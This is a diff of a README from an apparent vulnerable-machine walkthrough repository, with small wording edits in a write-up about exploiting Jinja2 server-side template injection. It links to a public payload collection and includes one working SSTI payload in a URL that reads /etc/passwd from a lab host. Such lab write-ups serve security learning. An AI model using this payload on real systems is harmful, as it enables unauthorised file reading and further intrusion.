BaadMaro/Hacking-vulnerable-machines/Thehackernewsbdarijav1/README.md

  Jinja2 is used by Python Web Frameworks such as Django or Flask

- You can different payload at : https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2
+ You can use differents payload at : https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection#jinja2

- I started by trying to read files
+ I started to read files

  http://192.168.1.106/?search={{%20get_flashed_messages.__globals__.__builtins__.open(%22/etc/passwd%22).read()%20}}